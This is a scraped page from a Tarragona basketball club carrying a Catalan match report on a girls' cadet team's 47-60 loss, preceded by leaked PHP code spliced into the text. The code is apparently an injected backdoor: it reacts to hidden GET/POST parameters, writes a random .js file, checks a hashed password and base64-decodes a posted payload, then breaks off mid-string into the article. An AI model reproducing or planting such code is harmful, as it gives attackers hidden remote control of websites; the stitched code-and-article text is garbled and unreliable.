function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" La falta d'efectius i l'actuació de la visitant Barrado, tomben el cadet femení 1 (47-60) - Tgn Bàsquet Club -

La falta d’efectius i l’actuació de la visitant Barrado, tomben el cadet femení 1 (47-60)

Updated: gener 27, 2016

El cadet femení 1, sense algunes de les seves jugdores, va perdre contra la Salle Tarragona en un partit que va estar dominat bàsicament per les visitants gràcies, bàsicament, a l’aportació de la seva millor jugadora, Barrado (32 punts).

Les locals van tenir molts problemes per atacar la defensa visitant, molt tancada especialment a partir del tercer quart. Tot i que el TGN Bàsquet va trobar bones posicions de tir, els llançaments no van entrar i la Salle ho va aprofitar per obrir forat. A falta de 4 minuts per acabar el partit el resultat era de 41-52 i, malgrat l’esforç local, la victòria es va escapar.

Cal destacar el paper de dues jugadores infantils, Andrea Steinhauser i Carla López, que van lluitar amb molt d’encert contra cadets de segon any.